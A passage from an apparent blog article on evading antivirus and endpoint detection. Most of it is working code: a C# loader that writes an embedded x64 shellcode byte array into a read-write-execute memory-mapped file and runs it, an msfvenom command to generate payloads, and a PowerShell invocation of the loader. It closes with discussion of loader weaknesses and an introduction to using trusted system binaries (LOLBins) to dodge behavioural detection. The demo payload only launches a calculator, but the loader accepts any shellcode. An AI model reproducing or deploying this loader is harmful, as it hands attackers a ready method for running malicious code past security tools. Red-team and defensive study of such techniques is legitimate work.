class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x18&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x44&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                   &lt;span class="m"&gt;0x8b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x40&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x20&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x49&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x01&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xd0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xe3&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x56&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xff&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xc9&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x34&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x88&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                   &lt;span class="m"&gt;0x01&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xd6&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x4d&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x31&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xc9&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x31&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xc0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xac&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xc1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xc9&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x0d&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x01&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xc1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                   &lt;span class="m"&gt;0x38&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xe0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x75&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xf1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x4c&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x03&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x4c&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x24&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x08&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x45&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x39&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xd1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x75&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xd8&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x58&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x44&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                   &lt;span class="m"&gt;0x8b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x40&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x24&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x49&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x01&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xd0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x66&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x0c&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x44&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x40&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x1c&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x49&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                   &lt;span class="m"&gt;0x01&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xd0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x04&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x88&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x01&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xd0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x58&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x58&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x5e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x59&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x5a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                   &lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x58&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x59&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x5a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x83&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xec&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x20&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x52&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xff&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xe0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x58&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                   &lt;span class="m"&gt;0x59&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x5a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x12&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xe9&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x57&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xff&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xff&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xff&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x5d&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xba&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x01&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x00&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x00&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                   &lt;span class="m"&gt;0x00&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x00&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x00&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x00&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x00&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8d&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8d&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x01&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x01&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x00&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x00&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xba&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x31&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                   &lt;span class="m"&gt;0x6f&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x87&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xff&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xd5&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xbb&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xe0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x1d&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x2a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x0a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xba&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xa6&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x95&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xbd&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x9d&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xff&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                   &lt;span class="m"&gt;0xd5&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x83&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xc4&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x28&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x3c&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x06&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x7c&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x0a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x80&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xfb&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xe0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x75&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x05&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xbb&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x47&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                   &lt;span class="m"&gt;0x13&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x72&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x6f&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x6a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x00&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x59&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x89&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xda&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xff&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xd5&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x63&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x61&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x6c&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x63&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x00&lt;/span&gt;
               &lt;span class="p"&gt;};&lt;/span&gt;

           &lt;span class="n"&gt;MemoryMappedFile&lt;/span&gt; &lt;span class="n"&gt;mmf&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="k"&gt;null&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
           &lt;span class="n"&gt;MemoryMappedViewAccessor&lt;/span&gt; &lt;span class="n"&gt;viewaccessor&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="k"&gt;null&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

           &lt;span class="k"&gt;try&lt;/span&gt;
           &lt;span class="p"&gt;{&lt;/span&gt;
               &lt;span class="cm"&gt;/* The try block creates the MMF and assigns the RWE permissions
               The view accessor is created with matching permissions
               the shell code from GetShellMemAddr is written to MMF
               then the pointer is gained and a delegate is created to handle pointer value
               so that it can be passed in therms of the returned function */&lt;/span&gt;

               &lt;span class="n"&gt;mmf&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="n"&gt;MemoryMappedFile&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;CreateNew&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"__shellcode"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Length&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;MemoryMappedFileAccess&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ReadWriteExecute&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
               &lt;span class="n"&gt;viewaccessor&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="n"&gt;mmf&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;CreateViewAccessor&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Length&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;MemoryMappedFileAccess&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ReadWriteExecute&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
               &lt;span class="n"&gt;viewaccessor&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;WriteArray&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Length&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
               &lt;span class="kt"&gt;var&lt;/span&gt; &lt;span class="n"&gt;pointer&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;*)&lt;/span&gt;&lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
               &lt;span class="n"&gt;viewaccessor&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;SafeMemoryMappedViewHandle&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;AcquirePointer&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;ref&lt;/span&gt; &lt;span class="n"&gt;pointer&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
               &lt;span class="kt"&gt;var&lt;/span&gt; &lt;span class="n"&gt;func&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;NewDelegate&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;Marshal&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;GetDelegateForFunctionPointer&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nf"&gt;IntPtr&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pointer&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="k"&gt;typeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;NewDelegate&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
               &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nf"&gt;func&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
           &lt;span class="p"&gt;}&lt;/span&gt;
           &lt;span class="k"&gt;catch&lt;/span&gt;
           &lt;span class="p"&gt;{&lt;/span&gt;
               &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;IntPtr&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Zero&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
           &lt;span class="p"&gt;}&lt;/span&gt;
           &lt;span class="k"&gt;finally&lt;/span&gt; &lt;span class="c1"&gt;// You should always clean up after yourself :)&lt;/span&gt;
           &lt;span class="p"&gt;{&lt;/span&gt;
               &lt;span class="n"&gt;viewaccessor&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;Dispose&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
               &lt;span class="n"&gt;mmf&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;Dispose&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
           &lt;span class="p"&gt;}&lt;/span&gt;
       &lt;span class="p"&gt;}&lt;/span&gt;

       &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;Main&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;string&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;args&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
       &lt;span class="p"&gt;{&lt;/span&gt;
           &lt;span class="nf"&gt;GetShellMemAddr&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
       &lt;span class="p"&gt;}&lt;/span&gt;
   &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight powershell"&gt;&lt;code&gt;&lt;span class="n"&gt;msfvenom&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-p&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;windows/x64/exec&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;CMD&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"cmd.exe -c calc.exe"&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-f&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;csharp&lt;/span&gt;&lt;span class="w"&gt;

&lt;/span&gt;&lt;span class="n"&gt;Invoke-MMFml&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fpnstcxx1406tdupz9cfu.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fpnstcxx1406tdupz9cfu.png" alt="Figure 10: MMFml PowerShell loader execution" width="716" height="69"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 10: MMFml PowerShell loader execution
  &lt;p&gt;&lt;/p&gt;

&lt;p&gt;I shall conclude the discussion on loaders at this point. It is highly recommended to develop custom loaders when possible, as they often yield superior evasion results. Two caveats on the MMFml loader above are worth stating. First, it maps a &lt;strong&gt;ReadWriteExecute&lt;/strong&gt; section under the fixed name &lt;code&gt;__shellcode&lt;/code&gt;; RWX regions (and well-known section names) are exactly what memory scanners flag, so the technique sidesteps on-disk signatures rather than memory inspection. Second, the &lt;code&gt;finally&lt;/code&gt; block calls &lt;code&gt;Dispose()&lt;/code&gt; on &lt;code&gt;viewaccessor&lt;/code&gt; and &lt;code&gt;mmf&lt;/code&gt; unconditionally: if &lt;code&gt;CreateNew&lt;/code&gt; throws, both are still &lt;code&gt;null&lt;/code&gt; and the "clean-up" itself raises a &lt;code&gt;NullReferenceException&lt;/code&gt; that replaces the &lt;code&gt;IntPtr.Zero&lt;/code&gt; return (the &lt;code&gt;AcquirePointer&lt;/code&gt; call is also never paired with &lt;code&gt;ReleasePointer&lt;/code&gt;). Note too that the embedded byte array ends in &lt;code&gt;calc\0&lt;/code&gt;, so it appears to have been generated with &lt;code&gt;CMD=calc&lt;/code&gt; rather than the &lt;code&gt;msfvenom&lt;/code&gt; command shown above.&lt;/p&gt;




&lt;h3&gt;
  
  
  B) Lolbins: Leveraging Trusted Binaries for Shellcode Loading
&lt;/h3&gt;

&lt;p&gt;Beyond the "cup and water" separation paradigm of loaders, I contend that &lt;strong&gt;Lolbins&lt;/strong&gt;—or whitelisted binaries—represent another significant category of separation-based evasion.&lt;/p&gt;

&lt;p&gt;These techniques are primarily designed to bypass &lt;strong&gt;behavioural detection&lt;/strong&gt;. For instance, when an application's execution context deviates from expected patterns—such as invoking specific &lt;strong&gt;APIs&lt;/strong&gt; that would not normally be called—such anomalous behaviour is readily detected. Proxying execution through a trusted, signed binary sidesteps heuristics that key on the &lt;em&gt;calling&lt;/em&gt; process. It must be stressed, however, that the binaries listed below are now heavily monitored in their own right: a script host, installer or build tool fetching a remote URL, spawning from an unexpected parent, or taking an unusual command line is a well-known telemetry pattern. These techniques therefore reduce, rather than eliminate, behavioural exposure.&lt;/p&gt;

&lt;p&gt;It should be noted, however, that in some cases the shellcode or executable files employed in these techniques may still be written to disk, rendering them susceptible to signature-based detection. We shall address this aspect later in the article. Let us first examine the concept of whitelist exploitation.&lt;/p&gt;

